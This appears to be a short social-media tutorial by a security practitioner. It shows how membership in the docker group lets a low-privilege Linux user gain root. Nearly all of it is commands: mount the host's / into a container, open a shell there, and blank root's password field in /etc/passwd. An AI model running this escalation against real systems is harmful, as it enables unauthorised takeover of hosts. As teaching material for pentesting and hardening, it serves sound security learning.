Aryan Ghai
TryHackMe Top 6% Globally || CCFA || Cyber Security Engineer || CrowdStrike EDR || SentinelOne || Linux Administrator || YouTuber ||Bug Hunter || Rapid7's Metasploit || Tenable
If a low priv user have priv to a docker grp then it may be possible to get root access.
docker run -dit -v /:/opt --name linux ubuntu
-v --> for attach volume
linux --> name of conatiner
ubuntu --> image file name
2. when you log in to docker container the you have the access of / directory of host machine.
?docker exec -it linux /bin/bash
3. Now, you have to edit /etc/passwd file and remove the passwd symbol from root user's entry.
root:remove_the entry:0:0:root:/root:/bin/bash
Now, you can login as root without the passwd.